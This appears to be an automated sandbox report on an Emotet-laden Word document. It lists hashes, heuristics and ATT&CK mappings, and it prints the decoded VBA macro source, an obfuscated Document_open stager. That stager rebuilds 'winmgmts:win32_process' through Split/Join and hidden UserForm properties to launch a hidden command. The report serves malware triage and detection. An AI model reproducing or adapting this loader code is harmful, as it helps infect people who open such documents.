Emotet Office (OLE) malware analysis — malicious · 0017bd312dca6a55

MALICIOUS

Office (OLE)

174.9 KB Created: 2020-08-18 12:34:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 62a38f0acbcbe336c0ddc3f3362ad34e SHA-1: 0a61380a3e9cbd569b44469621fd55ee18f947ca SHA-256: 0017bd312dca6a55a4c8573e1bb88ad991b85da2a1546ba713ccd52f2554132a

232 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' and the ClamAV detection 'Doc.Downloader.Emotet-9374561-0' strongly indicate this is an Emotet downloader. The VBA macro is designed to execute a command stager, likely downloading and running a secondary payload. The obfuscation techniques observed in the VBA script further support this assessment.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-9374561-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-9374561-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
Gql72qljol4z2l9h9_ = Split _
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Gxc_ynzdism7mp8 = CreateObject(Bfqtjjxnpuii3aev0q)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Document_open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10501 bytes
SHA-256: `efc7af16dc9c8a673f4d940fa356390e5c1baf5adca78f4667201ac99c3599d9`
Detection ClamAV: No threats found Obfuscation or payload: likely 56 of 107 identifiers look randomly generated (e.g. 'Euha1yvgecxfDqcj2v_chrgd') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "F_ew8g4vle7us" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Xxmw_o8wlut.Xubyyrc33i_o End Sub Attribute VB_Name = "Xxmw_o8wlut" Attribute VB_Base = "0{9C186686-7193-4330-AED0-2EB279528E9B}{FAA1B552-A013-4F26-857F-86CDFEFFCB61}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Xubyyrc33i_o() For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 951 Fey5x8ez0fb1 = 221 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Awd6b5sp47st0hgdf = Yidev3gasg72qs R0tgj3ba5vldjl08 = Xxmw_o8wlut.HelpContextId + 50 + 50 For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 68 Fey5x8ez0fb1 = 317 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Y2joi3yd23y41xw0 = Yidev3gasg72qs D_2z491aucfgky8t = ChrW(R0tgj3ba5vldjl08 + (15)) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 252 Fey5x8ez0fb1 = 783 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Jlm1vyttw9ijyk_yef = Yidev3gasg72qs Tveofrj0a1vd = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + D_2z491aucfgky8t + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Xxmw_o8wlut.J_m_1m9aoif + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg" For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 609 Fey5x8ez0fb1 = 652 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Fidhcy_42jislpve = Yidev3gasg72qs Bfqtjjxnpuii3aev0q = Y0ilxpsxua0l9vdw6j(Tveofrj0a1vd) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 148 Fey5x8ez0fb1 = 666 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Yceejdn_mb2b = Yidev3gasg72qs Set Gxc_ynzdism7mp8 = CreateObject(Bfqtjjxnpuii3aev0q) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 81 Fey5x8ez0fb1 = 122 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Zvjkn9_72cc = Yidev3gasg72qs Doo2bvagt3xn = Xxmw_o8wlut.Zjsc624lon9sz.ControlTipText For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 526 Fey5x8ez0fb1 = 45 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Qlwaom976kzytar0 = Yidev3gasg72qs Cljkjf51x27lb_llv = Aiu3sk4via1k6fo + (Bfqtjjxnpuii3aev0q + D_2z491aucfgky8t + Xxmw_o8wlut.Jk3c9h4ff_x_79bf.ControlTipText + Doo2bvagt3xn) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 803 Fey5x8ez0fb1 = 413 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 K8j_iia605py7l6 = Yidev3gasg72qs M6fxnaqm7xcq488jt = Cljkjf51x27lb_llv + Xxmw_o8wlut.J_m_1m9aoif For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 392 Fey5x8ez0fb1 = 463 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Xtwf_5dy37q = Yidev3gasg72qs Set Urr__oir7w08r = X6ueiwztxu96lbv(M6fxnaqm7xcq488jt) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 586 Fey5x8ez0fb1 = 332 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Erpw4wfz01wtat1 = Yidev3gasg72qs Snugnjiw7n1bpcrt = Array(Dr4svl9aje3uw + "Cbn6anhg3_97ev2 Euha1yvgecxfDqcj2v_chrgd S5vzgnjd9inw8qrg29", Gxc_ynzdism7mp8. _ Create(Fs_x7gzs9rt0876fj, Bcwu6xo_3c0ca839, Urr__oir7w08r), Pp7k7bhh1y6ft7rtq + "Xdj1c4nsa0g Reszwlcqgbpmf N6jhsuv776s6mc8oai J_2x5kgq_66") For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 613 Fey5x8ez0fb1 = 456 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Yn9r3upp41vtkwrp = Yidev3gasg72qs End Function Function X6ueiwztxu96lbv(R71l4hdihayzg) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 344 Fey5x8ez0fb1 = 568 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 O7uawys4ei9urrtqnd = Yidev3gasg72qs Set X6ueiwztxu96lbv = CreateObject(R71l4hdihayzg) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 338 Fey5x8ez0fb1 = 146 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Z1beev8hra_9oecj = Yidev3gasg72qs X6ueiwztxu96lbv. _ showwindow = Yvejti5rx34iyg20 + O4bgl304hp8mdvabfv For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 435 Fey5x8ez0fb1 = 704 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 I7yo78nf7409959hs = Yidev3gasg72qs End Function Function Y0ilxpsxua0l9vdw6j(Pdixqethlx8m4_eex) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 845 Fey5x8ez0fb1 = 819 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 D5if_mrtcr8a1 = Yidev3gasg72qs Yc_1jt4g9jdcv = Pdixqethlx8m4_eex For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 82 Fey5x8ez0fb1 = 78 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Pw9_iw28dyjn13h0 = Yidev3gasg72qs Gql72qljol4z2l9h9_ = Split _ (Yc_1jt4g9jdcv, "58[sn ]]][ jsa 21u7gsggg") For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 657 Fey5x8ez0fb1 = 160 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Mwydu7bwwudrtb = Yidev3gasg72qs I2rolbgeh_dn8 = F5nfg3pwgs_yu + Join(Gql72qljol4z2l9h9_, Mqc5tw5fqm59) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 229 Fey5x8ez0fb1 = 553 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Pzydcgd4t3riede = Yidev3gasg72qs Y0ilxpsxua0l9vdw6j = I2rolbgeh_dn8 For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 244 Fey5x8ez0fb1 = 403 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Xaus01laj54p3h6 = Yidev3gasg72qs End Function Function Fs_x7gzs9rt0876fj() For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 180 Fey5x8ez0fb1 = 671 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Qeyvpbvqrlo9q_155h = Yidev3gasg72qs Qmgsfcxkgpje3tizmp = Xxmw_o8wlut.Dgykhdrp3fn.Caption For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 883 Fey5x8ez0fb1 = 155 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 Q76nhkpfbqfkr = Yidev3gasg72qs Fs_x7gzs9rt0876fj = Y0ilxpsxua0l9vdw6j(Qmgsfcxkgpje3tizmp) For Lmin297j4uyo = 5 To 62 DoEvents Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Debug.Print (CStr(Nr557fi_4rr) & CStr(Svl0kr11sywf4)) Next Lmin297j4uyo Yidev3gasg72qs = 922 Fey5x8ez0fb1 = 374 Yidev3gasg72qs = Yidev3gasg72qs + Fey5x8ez0fb1 V5m4k8rjqbvn = Yidev3gasg72qs End Function

Open this report in the interactive analyzer, or submit your own file for analysis.